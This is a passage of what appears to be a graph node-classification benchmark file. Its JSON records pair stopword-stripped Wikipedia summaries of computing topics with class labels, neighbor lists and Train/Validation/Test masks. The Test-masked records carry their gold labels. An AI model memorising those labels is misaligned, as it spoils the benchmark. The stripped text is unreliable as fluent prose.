      3611,
      9249,
      9762,
      6179,
      10789,
      5158,
      5677,
      7225,
      11323,
      9277,
      8772,
      7248,
      597,
      1109,
      2135,
      10327,
      11363,
      4708,
      8298,
      8810,
      9836,
      7789,
      5233,
      9333,
      1142,
      631,
      6263,
      9335,
      9343,
      7818,
      4235,
      654,
      2193,
      2194,
      2197,
      2710,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      1707,
      5293,
      3247,
      7344,
      6322,
      2230,
      7863,
      5816,
      1212,
      8380,
      3265,
      6338,
      10436,
      710,
      10951,
      6858,
      9420,
      7378,
      3795,
      4819,
      3285,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      9955,
      8938,
      3820,
      1263,
      3312,
      5872,
      3826,
      2291,
      9972,
      246,
      3834,
      3326,
      11012,
      5384,
      1801,
      2314,
      7432,
      8461,
      6416,
      1809,
      1810,
      6935,
      11033,
      287,
      1823,
      1825,
      6434,
      8994,
      1316,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      2871,
      6970,
      11072,
      3909,
      8007,
      2378,
      2895,
      4431,
      5969,
      346,
      2394,
      2395,
      2397,
      3931,
      5471,
      4960,
      7005,
      5474,
      10596,
      2407,
      10087,
      11626,
      7022,
      6518,
      1399,
      1400,
      376,
      890,
      6519,
      11128,
      11129,
      11638,
      7554,
      7049,
      4490,
      8075,
      1933,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      7072,
      10151,
      4012,
      1454,
      6062,
      9137,
      8114,
      7603,
      8631,
      1464,
      1978,
      6591,
      7104,
      9665,
      11201,
      8643,
      1990,
      1480,
      6098,
      7126,
      2008,
      10200,
      1503,
      2015,
      1509,
      9189,
      7148,
      7663,
      8179,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 3329,
    "label": 4,
    "text": "Identity_Interrogation:identity interrogation identity interrogation method authentication identity proofing involves posing one knowledge-based authentication questions individual identity interrogation questions mother ’ maiden name last four digits social security number questioning process requires individuals reveal personally identifiable information pii order prove identity method businesses use prevent identity theft impersonation customers identity interrogation primarily employed remote in-person interactions teller bank many interactions require user authentication internet telephone employ identity interrogation substitute stronger authentication methods physical ownership authentication i.e presenting driver license bankcard biometrics i.e fingerprint facial recognition available mainly in-person interactions identity interrogation used assist risk management account security legal regulatory compliance remote interactions addition technique developed assist prevention identity fraud illegal use another person identity commit fraud criminal activities identity interrogation methods commonly used governments organizations companies banks financial intermediaries credit card companies internet providers telecommunications companies insurance providers others",
    "neighbors": [
      6562,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 3330,
    "label": 6,
    "text": "Hidden_file_and_hidden_directory:hidden file hidden directory computing hidden folder sometimes hidden directory hidden file folder file filesystem utilities display default showing directory listing commonly used storing user preferences preserving state utility frequently created implicitly using various utilities security mechanism access restricted usually intent simply clutter display contents directory listing files user directly create unix-like operating systems file folder starts dot character example /home/user/.config commonly called dot file dotfile treated hidden – codice_1 command display unless codice_2 flag codice_3 used command-line shells wildcards match files whose names start codice_4 unless wildcard starts explicit codice_4 convention arose using dotfiles user home directory store per-user configuration informational text early uses well-known dotfiles codice_6 codice_7 codice_8 configuration files bourne shell c shell shells compatible codice_9 codice_10 used codice_11 codice_12 commands many applications bash desktop environments gnome store per-user configuration way unix/linux freedesktop.org xdg base directory specification aims migrate user config files individual dotfiles codice_13 non-hidden files hidden directory codice_14 android operating system uses empty codice_15 files tell smartphone apps display include contents folder prevents digital photos digital music files shown picture galleries played mp3 player apps useful prevent downloaded voicemail files playing songs playlist keep personal photos private still allowing folders shared person friends family colleagues codice_15 file effect filesystem even operating system instead depends entirely individual app respect presence different files gnome desktop environment well programs written using glib filenames listed file named codice_17 directory also excluded display gnome file manager keyboard shortcut enables display kinds hidden files addition dotfile behaviour files invisible attribute hidden finder although codice_1 invisible attribute set cleared using codice_19 command example invoking codice_20 hide file jimbo starting mac os x snow leopard codice_21 command also used example codice_22 hide file jimbo dos systems file directory entries include hidden file attribute manipulated using attrib command use command line command codice_23 display files attribute hidden windows explorer content directory hidden appending pre-defined clsid end folder name directory still visible content becomes one windows special folders however real content directory still seen using cli command codice_24",
    "neighbors": [
      2432,
      9732,
      5256,
      5514,
      5397,
      537,
      8988,
      6813,
      7325,
      9762,
      5158,
      1193,
      7983,
      52,
      1844,
      1083,
      2109,
      9533,
      10815,
      3522,
      3280,
      5969,
      6358,
      5975,
      1509,
      9319,
      8301,
      6126,
      7663,
      9840,
      3571,
      7540,
      10751
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3331,
    "label": 7,
    "text": "GLite:glite glite pronounced gee-lite middleware computer software project grid computing used cern lhc experiments scientific domains implemented collaborative efforts 80 people 12 different academic industrial research centers europe glite provides framework building applications tapping distributed computing storage resources across internet glite services adopted 250 computing centres used 15000 researchers europe around world prototyping phases 2004 2005 convergence lhc computing grid lcg-2 distribution reached may 2006 glite 3.0 released became official middle-ware enabling grids e-science egee project ended 2010 development glite middle-ware taken european middleware initiative maintained part emi software stack distributed computing infrastructure built egee supported european grid infrastructure runs grid middle-ware produced european middleware initiative many components came glite middle-ware glite user community grouped virtual organisations vos user must join vo supported infrastructure running glite authenticated authorized using grid resources grid security infrastructure gsi wlcg/egee enables secure authentication communication open network gsi based public key encryption x.509 certificates secure sockets layer ssl communication protocol extensions single sign-on delegation authenticate him/herself user needs digital x.509 certificate issued certification authority ca trusted infrastructure running middle-ware authorization user specific grid resource done two different ways first simpler relies grid-mapfile mechanism second way relies virtual organisation membership service voms lcas/lcmaps mechanism allow detailed definition user privileges access point glite grid user interface ui machine users personal account user certificate installed ui user authenticated authorized use wlcg/egee resources access functionalities offered information workload data management systems provides cli tools perform basic grid operations computing element ce grid terminology set computing resources localized site i.e cluster computing farm ce includes grid gate gg acts generic interface cluster local resource management system lrms sometimes called batch system cluster collection worker nodes wns nodes jobs run two ce implementations glite 3.1 lcg ce developed edg used lcg-22 glite ce developed egee sites choose install provide types gg responsible accepting jobs dispatching execution wns via lrms glite 3.1 supported lrms types openpbs/pbspro platform lsf maui/torque bqs condor sun grid engine storage element se provides uniform access data storage resources storage element may control simple disk servers large disk arrays tape-based mass storage systems mss wlcg/egee sites provide least one se storage elements support different data access protocols interfaces simply speaking gsiftp gsi-secure ftp protocol whole-file transfers local remote file access performed using rfio gsidcap storage resources managed storage resource manager srm middle-ware service providing capabilities like transparent file migration disk tape file pinning space reservation etc however different ses may support different versions srm protocol capabilities vary number srm implementations use varying capabilities disk pool manager dpm used fairly small ses disk-based storage castor designed manage large-scale mss front-end disks back-end tape storage dcache targeted mss large-scale disk array storage systems srm implementations development srm protocol specification also evolving classic ses srm interface provide simple disk-based storage model process phased information service provides information wlcg/egee grid resources status information essential operation whole grid via resources discovered published information also used monitoring accounting purposes much data published conforms glue schema defines common conceptual data model used grid resource monitoring discovery information system used glite 3.1 inherits main concepts globus monitoring discovery service mds however gris giis mds replaced berkeley database information index essentially openldap server updated external process purpose workload management system wms accept user jobs assign appropriate computing element record status retrieve output resource broker rb machine wms services run jobs submitted described using job description language jdl specifies example executable run parameters files moved worker node job run input grid files needed requirements ce worker node choice ce job sent made process called match-making first selects among available ces fulfill requirements expressed user close specified input grid files chooses ce highest rank quantity derived ce status information expresses goodness ce typically function numbers running queued jobs rb locates grid input files specified job description using service called data location interface dli provides generic interface file catalogue way resource broker talk file catalogs lfc provided dli interface recent implementation wms egee allows submission single jobs also collections jobs possibly dependencies much efficient way old lcg-2 wms many new options finally logging bookkeeping service lb tracks jobs managed wms collects events many wms components records status history job glite components services contributing partners",
    "neighbors": [
      5956,
      198,
      3849,
      7983,
      9040,
      3379,
      2710,
      5654,
      8122,
      7294
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3332,
    "label": 9,
    "text": "Singleton_variable:singleton variable computer programming singleton variable variable referred examples variable might referenced dummy argument function call address assigned another variable subsequently accesses allocated storage singleton variables sometimes occur mistake made – assigning value variable forgetting use later mistyping one instance variable name compilers lint-like tools flag occurrences singleton variables",
    "neighbors": [
      1952
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3333,
    "label": 4,
    "text": "Security_Shield:security shield security shield also known securityshield series rogue security software programs asks amount money get full version protection minor non-existent viruses",
    "neighbors": [
      7515,
      4165,
      9287
    ],
    "mask": "Train"
  },
  {
    "node_id": 3334,
    "label": 9,
    "text": "SCM_(Scheme_implementation):scm scheme implementation scm programming language dialect language scheme written language c aubrey jaffer author slib scheme library jacal interactive computer algebra symbolic mathematics program conforms standards r4rs r5rs ieee p1178 free open-source software released gnu lesser general public license lgpl scm runs many different operating systems amigaos also emulation linux atari-st macos scm mac dos os/2 nos/ve unicos vms unix similar systems scm includes hobbit scheme-to-c compiler written originally 2002 tanel tammet generates c files binaries dynamically statically linked scm executable scm includes linkable modules slib features like sequence comparison arrays records byte-number conversions modules portable operating system interface posix system calls network sockets readline curses xlib platforms scm supports unexec developed emacs bash dumps executable image running scm results fast startup scm scm developed scheme one defun siod 1990 gnu guile developed scm 1993",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      1902,
      5492,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      10176,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      4589,
      5612,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3335,
    "label": 0,
    "text": "Lessac_Technologies:lessac technologies lessac technologies inc. lti american firm develops voice synthesis software licenses technology sells synthesized novels mp3 files firm currently seven patents granted lti technology partly based work late arthur lessac professor theater state university new york creator lessac kinesensic training lti licensed exclusive rights exploit arthur lessac copyrighted works fields speech synthesis speech recognition based view music speech speech music lessac work books focused body speech energies go together arthur lessac textual annotation system originally developed assist actors singers orators marking scripts prepare performance adapted lti speech synthesis system basic representation speech synthesized lessemes contrast many systems use phonetic representation lti ’ software two major components 1 linguistic front-end converts plain text sequence prosodic phonosensory graphic symbols lessemes based arthur lessac annotation system specify speech units synthesized 2 signal-processing back-end takes lessemes acoustic data produces human-sounding synthesized speech output using unit selection concatenation lti ’ text-to-speech system came second world-wide blizzard challenge 2011 2012 first-place team 2011 also employed lti front-end technology back-end blizzard challenge conducted language technologies institute carnegie mellon university devised way evaluate speech synthesis techniques different research groups build voices voice-actor recordings comparing results listening tests lti founded 2000 h. donald wilson chairman lawyer lexisnexis entrepreneur business associate arthur lessac gary a. marple chief inventor marple suggested arthur lessac kinesensic voice training might applicable computational linguistics wilson ’ death 2006 nephew john reichenbach became firm ’ ceo",
    "neighbors": [
      1890,
      4092,
      3533
    ],
    "mask": "Test"
  },
  {
    "node_id": 3336,
    "label": 9,
    "text": "Paul_Graham_(programmer):paul graham programmer paul graham born 13 november 1964 english-born computer scientist entrepreneur venture capitalist author essayist best known work lisp former startup viaweb later renamed yahoo store co-founding influential startup accelerator seed capital firm combinator blog hacker news author several programming books lisp 1993 ansi common lisp 1995 hackers painters 2004 technology journalist steven levy described graham hacker philosopher paul graham family moved pittsburgh pennsylvania 1968 attended gateway high school graham received bachelor arts philosophy cornell university 1986 attended harvard university earning master science 1988 doctor philosophy 1990 degrees computer science also studied painting rhode island school design accademia di belle arti florence 1996 graham robert morris founded viaweb first application service provider asp viaweb software written mostly common lisp allowed users make internet stores summer 1998 viaweb sold yahoo 455,000 shares yahoo stock valued 49.6 million acquisition product became yahoo store later gained fame essays posts personal website paulgraham.com essay subjects range beating averages compares lisp programming languages introduced hypothetical programming language blub nerds unpopular discussion nerd life high school collection essays published hackers painters o'reilly includes discussion growth viaweb graham perceives advantages lisp program 2001 graham announced working new dialect lisp named arc years since written several essays describing features goals language internal projects combinator written arc notably hacker news web forum news aggregator program 2005 giving talk harvard computer society later published start startup graham along trevor blackwell jessica livingston robert morris started combinator provide seed funding large number startups particularly started younger technically oriented founders combinator invested 1300 startups including justin.tv xobni dropbox airbnb stripe businessweek included paul graham 2008 edition annual feature 25 influential people web 2008 paul graham married jessica livingston response proposed stop online piracy act sopa graham announced late 2011 representatives company supporting would invited combinator demo day events graham proposed disagreement hierarchy 2008 essay disagree putting types argument seven-point hierarchy observing moving disagreement hierarchy makes people less mean make happier graham also suggested hierarchy thought pyramid highest forms disagreement rarer following hierarchy graham notes articulate forms name-calling e.g author self-important dilettante different crude insults graham considers hierarchy programming languages example blub hypothetically average language right middle abstractness continuum powerful language powerful cobol machine language used graham illustrate comparison beyond turing completeness programming language power specifically illustrate difficulty comparing programming language one knows one one graham considers hypothetical blub programmer programmer looks power continuum considers lower languages less powerful miss feature blub programmer used looks fails realise looking merely sees weird languages unnecessary features assumes equivalent power hairy stuff thrown well graham considers point view programmer using language higher blub describes programmer looking blub noting missing features point view higher language graham describes blub paradox concludes induction programmers position see differences power various languages understand powerful one concept cited writers joel spolsky",
    "neighbors": [
      10752,
      11269,
      2062,
      4623,
      6160,
      9231,
      9749,
      8728,
      4633,
      8735,
      8226,
      8747,
      2105,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      3675,
      7267,
      8293,
      2666,
      1653,
      5751,
      7805,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      9416,
      10953,
      8908,
      205,
      4830,
      10463,
      7392,
      7904,
      11488,
      1771,
      5360,
      5361,
      8435,
      6906,
      7421,
      3334,
      6919,
      1301,
      1305,
      10012,
      3869,
      2335,
      3370,
      10547,
      311,
      10083,
      6502,
      7539,
      3446,
      4992,
      7562,
      11659,
      6556,
      6047,
      4516,
      5031,
      9128,
      5569,
      6594,
      4550,
      6603,
      11218,
      10712,
      3034,
      3051,
      9714,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 3337,
    "label": 4,
    "text": "AMD_Platform_Security_Processor:amd platform security processor amd platform security processor psp officially known amd secure technology trusted execution environment subsystem incorporated since 2013 amd microprocessors according amd developer guide subsystem responsible creating monitoring maintaining security environment functions include managing boot process initializing various security related mechanisms monitoring system suspicious activity events implementing appropriate response critics worry used backdoor security concern amd denied requests open source code runs psp psp similar intel management engine intel processors psp arm core inserted main cpu september 2017 google security researcher cfir cohen reported vulnerability amd psp subsystem could allow attacker access passwords certificates sensitive information patch rumored become available vendors december 2017 march 2018 handful alleged serious flaws announced amd zen architecture cpus epyc ryzen ryzen pro ryzen mobile israeli security company related psp could allow malware run gain access sensitive information amd announced firmware updates handle flaws claims flaws published purpose stock manipulation validity technical standpoint upheld independent security experts reviewed disclosures although high risks claimed cts labs often dismissed said independent experts",
    "neighbors": [
      7936,
      9092,
      4444,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3338,
    "label": 2,
    "text": "IPad_Air_(2019):ipad air 2019 third-generation ipad air tablet computer designed developed marketed apple inc announced march 18 2019 alongside 5th generation ipad mini device similar ipad air 2 10.5-inch ipad pro features apple a12 bionic chip 64 256 gb storage upgraded 10.5-inch retina display support apple pencil 1st generation bluetooth 5.0 faster memory lpddr4x instead ipad air 2 lpddr3 third-generation ipad air features upgraded front camera system 7mp 1080p camera used since 2016 starting iphone 7 continued iphone xs continues older 8mp 1080p rear camera system used since ipad air 2 2014 record 4k ipad air retains lightning port keeps headphone jack third-generation ipad air 2.49ghz six-core processor apple a12 bionic chip chip 66 faster clock speed 1.5ghz triple-core apple a8x third-generation ipad air predecessor ipad air 2 third-generation ipad air true tone display allows lcd adapt ambient lighting change color intensity different environments 3x faster ipad air 2 battery last 10 hours",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      2673,
      2686,
      6783,
      10878,
      8842,
      3228,
      2207,
      4258,
      7842,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      1776,
      10481,
      7420,
      1290,
      781,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      2388,
      3928,
      4957,
      6495,
      9063,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      2979,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      2023,
      7154
    ],
    "mask": "Test"
  },
  {
    "node_id": 3339,
    "label": 3,
    "text": "Tao_ExDOS:tao exdos tao exdos emulator software application designed allow users old ms-dos applications run applications new operating systems windows 10 windows 8 windows 7 windows vista windows xp windows 2000 windows terminal server tao exdos enables users dos applications work applications new operating systems using built-in virtual 8086 mode x86 cpu tao exdos enables dos 16-bit windows applications run dos run effectively 32-bit windows desktop environments including windows 10/8/7/vista/xp/2000 windows terminal server 2003/2008 support 64-bit systems available windows 7 via virtual xp mode downloaded free microsoft windows 7 professional ultimate enterprise versions additional modules allow dos users print printers connected usb ports network printers fax printers pdf microsoft word html image files",
    "neighbors": [
      6730,
      4074,
      9166,
      7983,
      847,
      477
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3340,
    "label": 2,
    "text": "WebOS_version_history:webos version history webos linux operating system smart devices formerly mobile operating system initially developed palm later acquired hewlett-packard lg electronics palm launched webos january 2009 various versions webos featured several devices including pre pixi veer phones hp touchpad tablet latest version 3.0.5 released 12 january 2012",
    "neighbors": [
      6178,
      2308,
      424,
      5384,
      11337,
      2285,
      7983,
      2258,
      2259,
      2420,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3341,
    "label": 9,
    "text": "JavaServer_Pages_Standard_Tag_Library:javaserver pages standard tag library javaserver pages standard tag library jstl component java ee web application development platform extends jsp specification adding tag library jsp tags common tasks xml data processing conditional execution database access loops internationalization jstl developed java community process jcp java specification request jsr 52 may 8 2006 jstl 1.2 released followed jstl 1.2.1 dec 7 2011 jstl provides effective way embed logic within jsp page without using embedded java code directly use standardized tag set rather breaking java code leads maintainable code enables separation concerns development application code user interface total six jstl tag library descriptors addition jstl jcp following jsrs develop standard jsp tag libraries",
    "neighbors": [
      9988,
      10526,
      10020,
      5677,
      7983,
      6067,
      2106,
      3517,
      6334,
      3518,
      3008,
      11582,
      1223,
      1095,
      3278,
      3920,
      2901,
      4959,
      4960,
      479,
      3558,
      1128,
      3560,
      9834,
      6636,
      3954
    ],
    "mask": "Test"
  },
  {
    "node_id": 3342,
    "label": 4,
    "text": "Virus_Bulletin:virus bulletin virus bulletin magazine prevention detection removal malware spam regularly features analyses latest virus threats articles exploring new developments fight viruses interviews anti-virus experts evaluations current anti-malware products virus bulletin founded 1989 monthly hardcopy magazine later distributed electronically pdf format monthly publication format discontinued july 2014 articles made available standalone pieces web site magazine located sophos headquarters abingdon oxfordshire uk co-founded owned jan hruska peter lammer co-founders sophos virus bulletin claims full editorial independence favour sophos products tests reviews technical experts anti-virus vendors written articles magazine also conducts comparison tests detection rates anti-virus software products manage detect 100 viruses wild without false alarming given vb100 award magazine holds annual conference late september early october computer security professionals recent years magazine conference branched discuss anti-spam security issues well malware notable previous speakers include mikko hyppönen eugene kaspersky graham cluley well representatives major anti-virus vendors",
    "neighbors": [
      7809,
      131,
      10372,
      4247,
      7449,
      4889,
      6683,
      9246,
      2721,
      37,
      2213,
      3243,
      5057,
      4421,
      5069,
      5586,
      4435,
      2005,
      8024,
      7515,
      2654,
      9055,
      4464,
      8703
    ],
    "mask": "None"
  },
  {
    "node_id": 3343,
    "label": 7,
    "text": "IceWall_SSO:icewall sso icewall sso web federated single sign-on software developed marketed hewlett packard enterprise globe released 1997 icewall sso evolved last 18 years.originally developed hp japan marketed global markets provides highly convenient comfortable yet highly secure environment since first release 1997 icewall sso seen adoption intranet b-to-c b-to-b many services globally 40 million user licenses sold far world latest version icewall sso 10.0 provides support new leading-edge technologies cloud virtualization icewall sso product line extended include windows support addition existing hp-ux linux versions furthermore support services icewall sso planned continue 2024 making product long stable service life latest version available 10.0 august 2010 supported platforms red hat enterprise linux hp-ux windows server icewall sso mainly reverse proxy type implementation configured work agent type well depending requirements icewall sso mainly consists two modules cgi process works reverse proxy accepts http/https requests web browser forwards backend applications.forwarder also handles loginprocess authorizations communicating authentication module mentioned daemon program accepts requests forwarder performs authentication getting user information certification db directory services rdb icp icewall cert protocol used forwarder authentication module",
    "neighbors": [
      8355,
      1638,
      9286,
      3323,
      2485,
      1304,
      5435
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3344,
    "label": 2,
    "text": "Collaboration_Data_Objects:collaboration data objects collaboration data objects cdo previously known ole messaging active messaging application programming interface included microsoft windows microsoft exchange server products library allows developers access global address list server objects addition contents mailboxes public folders cdo technology building messaging collaboration applications cdo used separately connection outlook object model gain access outlook cdo part outlook object model n't provide event-based functionality outlook objects manipulated using cdo starting exchange 2007 neither messaging api mapi client libraries cdo 1.2.1 provided part base product installation available downloads",
    "neighbors": [
      10886,
      10026,
      6797,
      3250,
      9909,
      8607
    ],
    "mask": "Test"
  },
  {
    "node_id": 3345,
    "label": 4,
    "text": "Cube_attack:cube attack cube attack method cryptanalysis applicable wide variety symmetric-key algorithms published itai dinur adi shamir september 2008 preprint revised version preprint placed online january 2009 paper also accepted presentation eurocrypt 2009 cipher vulnerable output bit represented sufficiently low degree polynomial gf 2 key input bits particular describes many stream ciphers based lfsrs des aes believed immune attack works summing output bit value possible values subset public input bits chosen resulting sum linear combination secret bits repeated application technique gives set linear relations secret bits solved discover bits authors show cipher resembles random polynomial sufficiently low degree sets public input bits exist high probability discovered precomputation phase black box probing relationship input output various choices public secret input bits making use information construction cipher paper presents practical attack authors implemented tested stream cipher previous known attack would effective state 10,000 bit lfsr secret dense feedback polynomial filtered array 1000 secret 8-bit 1-bit s-boxes whose input based secret taps lfsr state whose output xored together bit lfsr initialized different secret dense quadratic polynomial 10 000 key iv bits lfsr clocked large secret number times without producing outputs first output bit given iv made available attacker short preprocessing phase attacker query output bits variety key iv combinations 2 bit operations required discover key cipher authors also claim attack version trivium reduced 735 initialization rounds complexity 2 conjecture techniques may extend breaking 1100 trivium 1152 initialization rounds maybe even original cipher best attack known trivium attack however embroiled two separate controversies firstly daniel j. bernstein disputes assertion previous attack 10,000-bit lfsr-based stream cipher existed claims attack reduced-round trivium n't give real reason think full trivium attacked claims cube paper failed cite existing paper xuejia lai detailing attack ciphers small-degree polynomials believes cube attack merely reinvention existing technique secondly dinur shamir credit michael vielhaber algebraic iv differential attack aida precursor cube attack dinur stated eurocrypt 2009 cube generalises improves upon aida however vielhaber contends cube attack attack another name however acknowledged parties involved cube use efficient linearity test blr test results new attack needing less time aida although substantial particular change remains dispute way cube aida differ vielhaber claims instance linear polynomials key bits obtained attack unusually sparse yet supplied evidence claims evidence appear forthcoming paper entitled algebraic iv differential attack aida attacking full trivium clear whether alleged sparsity applies ciphers trivium",
    "neighbors": [
      7034,
      8674,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 3346,
    "label": 3,
    "text": "The_Black_Onyx:black onyx memory limitations another part game released separately platforms added magic system two parts announced allowed party explore wilderness allowed party take part arena battles sg-1000 version one last releases console succeeded portrait loretta english-language fan-translation made available sg-1000 version back-porting abandoned source files similar hobby conversion project colecovision system group called team pixelboy later used source files complete project released unofficial english-language colecovision game 2013 player create five-member party 4 members gbc ask friendly encounters join party fill empty slots party explore dungeons town utsuro ウツロ obtain legendary black onyx break curse binds town eternal night combat system concept distance bows similar missile weapons melee weapons shields armor however hospital town offer examinations display pcs stats bank town heroes deposit money protects money thieves interest deposits since time system labyrinth town several entrances hidden one locations town labyrinth six floors corresponding six colors computer display must solved proper order depends platform order create stairway black tower onyx resides black onyx adapted manga titled published gamest comics collection april 1999 drawn kouta hirano",
    "neighbors": [
      10931,
      6077,
      9006,
      7023
    ],
    "mask": "Test"
  },
  {
    "node_id": 3347,
    "label": 4,
    "text": "Festi_botnet:festi botnet festi botnet also known alias spamnost botnet mostly involved email spam denial service attacks festi botnet first discovered around autumn 2009 time estimated botnet consisted roughly infected machines spam volume capacity roughly 2.5 billion spam emails day recent estimates dated august 2012 display botnet sending spam unique ip addresses quarter total amount 1 million detected ip sending spam mails besides capable sending email spam research festi botnet demonstrated also capable performing denial service attacks",
    "neighbors": [
      3072,
      10756,
      3724,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      7739,
      3643,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Train"
  },
  {
    "node_id": 3348,
    "label": 3,
    "text": "Continental_Circus:continental circus continental circus racing simulation arcade game created manufactured taito 1987 1989 ports released amiga amstrad cpc atari st commodore 64 msx zx spectrum arcade version game comes upright sit-down models feature shutter-type 3d glasses hanging player head according computer video games 1988 world first three dimensional racing simulation home conversions continental circus lack full-on 3d special glasses arcade version circus common term racing france japan likely stemming latin term racecourse unrelated 1972 french film motor racing also called continental circus 2005 game made available playstation 2 xbox pc part taito legends in-game vehicle 1987 camel-sponsored honda/lotus 99t formula one car driven ayrton senna satoru nakajima due licensing reasons sponsor names camel delonghi intentionally misspelled prevent copyright infringement japanese law player must successfully qualify eight different races win beginning player must take 80th place better advance player advances worst possible position qualify player fails meet qualify timer runs game player however option continue player fails qualify final race game automatically player continue real f1 races car susceptible damage contact another car player hits car piece trackside scenery called pits let car smoke long catch fire message impending explosion appear either way fail make back hit another car crash explode costing several seconds also car reaches speeds excess 380 km/h speedometer turn yellow warning player let know car going much fast car hits another car behind collision send car devastating cartwheel explodes costing several seconds light going fast turn cause car lose grip road car loses grip spin control low chance wreck happening definitely take several seconds clock also time time thunderstorm occur causing track become wet causing car lose traction case message change tires appear player must immediately get pits change wet-tyres storm dies road covered puddles pose threat continental circus music race plays intro/outro music race vein pole position afterwards screen cuts start line race course announcement gentlemen start engines 30 seconds start spoken line lifted 1972 french documentary game bears name entire collection musical scores sound effects voice clips featured compilation soundtrack known 究極tiger -g.s.m.taito 2- musical score composed zuntata taito house band excerpts arcade soundtrack included sinclair user cover tape music home versions composed ben daglish game commercially successful number-two coinslot dedicated arcade game chart behind street fighter home conversion went number 2 uk sales chart behind power drift january 1989 issue sinclair user gave award 1988 cock-up year title continental circus appearing spell circuit incorrectly",
    "neighbors": [
      9957,
      11690,
      10316,
      9006,
      629,
      6390,
      1340
    ],
    "mask": "Test"
  },
  {
    "node_id": 3349,
    "label": 2,
    "text": "Soname:soname unix unix-like operating systems soname field data shared object file soname string used logical name describing functionality object typically name equal filename library prefix thereof e.g codice_1 soname often used provide version backwards-compatibility information instance versions 1.0 1.9 shared library codice_2 provide identical interfaces would soname e.g codice_3 system includes version 1.3 shared object filename codice_4 soname field shared object tells system used fill dependency binary originally compiled using version 1.2 note codice_5 particular case complex history see gnu c library application binary interface abi library changes backward-incompatible way soname would incremented e.g codice_6 codice_7 gnu linker uses codice_8 codice_9 specify library name field internally linker create codice_10 field populate codice_11 given shared object file one use following command get information within library file using objdump objdump -p libx.so.1.3 grep soname",
    "neighbors": [
      9921,
      5492,
      5397,
      2804,
      823,
      1501
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3350,
    "label": 5,
    "text": "Usenet:usenet usenet worldwide distributed discussion system available computers developed general-purpose unix-to-unix copy uucp dial-up network architecture tom truscott jim ellis conceived idea 1979 established 1980 users read post messages called articles posts collectively termed news one categories known newsgroups usenet resembles bulletin board system bbs many respects precursor internet forums widely used today discussions threaded web forums bbss though posts stored server sequentially name comes term users network major difference bbs web forum usenet absence central server dedicated administrator usenet distributed among large constantly changing conglomeration servers store forward messages one another so-called news feeds individual users may read messages post messages local server operated commercial usenet provider internet service provider university employer server usenet culturally historically significant networked world given rise popularized many widely recognized concepts terms faq flame sockpuppet spam 1990s internet became commonly affordable usenet connections via fidonet dial-up bbs networks made long-distance worldwide discussions communication widespread needing server local telephone service usenet conceived 1979 publicly established 1980 university north carolina chapel hill duke university decade world wide web went online general public received access internet making one oldest computer network communications systems still widespread use originally built poor man arpanet employing uucp transport protocol offer mail file transfers well announcements newly developed news software news name usenet emphasized creators hope usenix organization would take active role operation articles users post usenet organized topical categories known newsgroups logically organized hierarchies subjects instance sci.math sci.physics within sci hierarchy science talk.origins talk.atheism talk hierarchy user subscribes newsgroup news client software keeps track articles user read newsgroups majority articles responses article set articles traced one single non-reply article called thread modern newsreaders display articles arranged threads subthreads example wine-making newsgroup rec.crafts.winemaking someone might start thread called best yeast thread conversation might grow dozens replies long perhaps six eight different authors several days conversation different wine yeasts might branch several sub-threads tree-like form user posts article initially available user news server news server talks one servers newsfeeds exchanges articles fashion article copied server server eventually reach every server network later peer-to-peer networks operate similar principle usenet normally sender rather receiver initiates transfers usenet designed conditions networks much slower always available many sites original usenet network would connect twice day batch-transfer messages largely 